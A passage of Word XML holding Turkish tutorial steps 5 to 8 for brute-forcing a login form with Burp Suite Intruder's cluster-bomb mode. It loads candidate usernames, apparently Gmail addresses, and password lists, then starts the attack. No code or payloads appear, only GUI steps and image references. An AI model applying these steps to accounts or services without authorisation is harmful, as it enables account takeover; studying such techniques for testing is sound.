    <w:p w14:paraId="2C094458" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Adım: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Yukarıdaki</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ekranda sağ tıklanıp </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">send to intruder </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">seçilir ve </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">intruder </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sekmesi altında aşağıdaki ekranla karşılaşılır. Burada tüm text bölümü seçilerek sol taraftan </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">clear </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>seçilir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">onra email ve password input değerleri seçilip </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">add </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">denir. Attack type kısmını </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">cluster bomb </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>seçip son halinin aşağıdaki gibi olması sağlanır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8FB351" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0507C63A" wp14:editId="164C5C37">
            <wp:extent cx="5512435" cy="3916680"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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435" cy="3916680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DF11F9" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09C17EDD" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F2C8C12" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B0679B0" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52772509" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FD4AAC7" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CA86C55" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4450E321" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E263231" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A606D66" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7051B599" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09B09CBB" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57796602" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="674B3DC8" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C8E0071" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EB3C045" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50E4135F" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58C80A89" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D49209C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4974B74B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DA8A20C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="695D6C1E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">6. Adım: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Gmail üzerinden denemek istenilen kullanıcı adları payload 1 kısmına aşağıdaki gibi girilir. Textbox'a istenilen kullanıcı adları girilip eklenebileceği gibi, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">load </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>butonu ile bir dosyadan da kullanıcı adları import edilebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400998DC" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A7A65DA" wp14:editId="14A214B2">
            <wp:extent cx="5512435" cy="3942080"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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435" cy="3942080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3A0138" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B4D9E42" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BBD0672" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DAD0D4B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52E3D3D5" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09426734" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="537DDAAE" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E3B262C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E341B1B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1000D2B2" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A9FC21F" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE6CF5E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AAE1428" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5347EF30" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09AFE82C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C6A8A65" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E4C1730" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="282265C1" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AA6645F" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">7. Adım: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Payload set değeri 2 olarak seçilip denenecek parolalar girilir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C656062" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2900A27E" wp14:editId="18668D99">
            <wp:extent cx="5512435" cy="393382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435" cy="3933825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="082F8192" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="218A7C28" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58C9D442" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51E0DDFD" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB10FF9" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35BE8DDD" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A5518EC" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DA9F411" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C052450" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C4EFFBB" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DB58DA4" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="090784DA" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0080627C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="584EE6DE" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65FBB8DA" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04EF5F36" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E245030" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02253CC6" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69992ACE" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="340C077E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">8. Adım: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Saldırı, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">intruder </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">menüsü altından </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">start attack </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">denilerek başlatılır. Burbsuite aracının lisanslı sürümü kullanılmadığı için denemeler biraz yavaş olacaktır. Aşağıda </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">response </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">menüsü altındaki </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">render </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>submenüsünün de web ara yüzünde cevabın çıktısı da görülebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C883168" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3152E78C" wp14:editId="5489ABD7">
            <wp:extent cx="5512435" cy="494284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2435" cy="4942840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDC4B4F" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6141D815" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="360B9B49" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F"/>
    <w:p w14:paraId="76510A72" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F"/>
    <w:p w14:paraId="1E0AA9D5" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F"/>
    <w:p w14:paraId="1A2211F2" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F"/>
    <w:p w14:paraId="281721EB" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F"/>
